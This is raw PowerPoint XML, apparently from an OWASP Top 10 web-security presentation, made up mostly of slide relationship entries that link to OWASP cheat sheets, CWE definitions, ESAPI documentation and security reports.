              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</a:t>
            </a:r>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smtClean="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smtClean="0"/>
              <a:t>Enter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owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/22.html" TargetMode="Externa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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference"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s://www.owasp.org/index.php/ASV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Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Error_Handling"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Configuration" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS"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s://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmark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cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.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csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm"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Testing_for_SSL-TLS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.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Testing_for_Path_Traversal" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="Externa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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html"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Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS"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s://www.owasp.org/index.php/Forced_browsi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Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI"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en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/home.cfm" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mojo.codehaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Good_Component_Practices_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0277" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/SafeNuGet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.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we.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html"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projects.webappsec.org/URL-Redirector-Abus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www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI"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Education_Presentation" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference"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Guide_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education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Code_Review_Guide" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://h3xstream.github.com/find-sec-bugs/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://findbugs.sourceforge.net/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/zaproxy/wiki/HelpStartConceptsAscan" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.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O2_Platform" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Live_CD_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Orizon_Project"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ategory:OWASP_Code_Crawler" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebScarab"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8.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Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:owasp-topten@lists.owasp.org"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wasp.org/index.php/Industry:Citations" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="Externa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19.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cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2011/09/ExpressionLanguageInjection.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Privacy_Violation" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/915.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Denial_of_Service" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Insufficient+Anti-automation" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010)" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Mass_assignment_vulnerability" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Information-Leakage" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdf" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.veracode.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2013/06/Aspect-2013-Global-AppSec-Risk-Report.pdf" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www2.trustwave.com/rs/trustwave/images/2013-Global-Security-Report.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitehatsec.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/spiderlabs/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/collateral/whitepaper/HP2012CyberRiskReport_0313.pdf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.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hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/"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hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_1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owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.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Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html"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hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referenc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ASVS"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Session_fixation" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.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XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.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ASVS" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId9" 